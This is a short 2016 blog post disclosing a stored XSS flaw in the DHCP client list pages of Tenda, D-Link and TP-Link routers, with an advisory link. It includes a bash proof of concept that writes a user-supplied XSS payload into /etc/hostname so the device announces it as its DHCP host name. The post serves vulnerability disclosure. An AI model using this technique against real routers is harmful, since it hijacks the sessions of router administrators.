November 29, 2016 lawrenceamer no responses

Tenda,Dlink,Tplink Routers are Vulnerable to persistent DHCP XSS

Want create site? With Free visual composer you can do it easy.

thousands of million of Routers manufactured by Tplink,dlink,Tenda are vulnerable to DHCP XSS on the main section for View connected DHCP Client List.

Attackers are able to spoof the name of their own DHCP host name into XSS payload to inject it on
a Router Client List .

the attack vector is loaded through viewing the client Connected DHCP , leading to execution of XSS payload with out secure parsing .

Lawrence Amer a researcher in Vulnerability Lab disclosed the exploit poc for reproducing the issue
included with Video to show the real impact .

Advisory :
https://www.vulnerability-lab.com/get_content.php?id=1990
Exploit POC :

#!/bin/bash
GREEN=$(tput setaf 2 && tput bold)
BLUE=$(tput setaf 6 && tput bold)
echo $BLUE"[+] Persistent XSS DHCP Exploiter via Routers"
echo $GREEN"[+] Vulnerability founded by : Lawrence Amer "
echo -n $BLUE"[~] type XSS Payload here :"
read -e xss
echo $xss > /etc/hostname
echo $GREEN"[+]DHCP HOST NAME IS WRITTEN"

Did you find apk for android? You can find new Free Android Games and apps.
Share it!
Aenean mattis venenatis

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Lawrence Amer | CPTE , CEH